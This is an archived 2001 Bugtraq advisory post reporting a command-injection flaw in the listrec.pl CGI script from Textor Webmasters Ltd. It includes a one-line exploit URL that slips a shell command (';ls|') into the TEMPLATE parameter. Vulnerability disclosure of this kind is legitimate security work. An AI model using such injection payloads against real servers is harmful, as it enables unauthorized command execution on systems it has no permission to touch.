[22617] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Textor Webmasters Ltd (listrec.pl)

daemon@ATHENA.MIT.EDU (Alexey Sintsov)
Wed Sep 12 00:09:23 2001

Date: 12 Sep 2001 04:01:24 -0000
Message-ID: <20010912040124.2862.qmail@securityfocus.com>
From: Alexey Sintsov <don_huan@xakep.ru>
To: bugtraq@securityfocus.com

Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has vulnerability (does not filter input of the 
user) which allows to carry out commands from 
WebServer.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls| 

XP-TEAM


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[22617] in bugtraq

Textor Webmasters Ltd (listrec.pl)

daemon@ATHENA.MIT.EDU (Alexey Sintsov)Wed Sep 12 00:09:23 2001

daemon@ATHENA.MIT.EDU (Alexey Sintsov)
Wed Sep 12 00:09:23 2001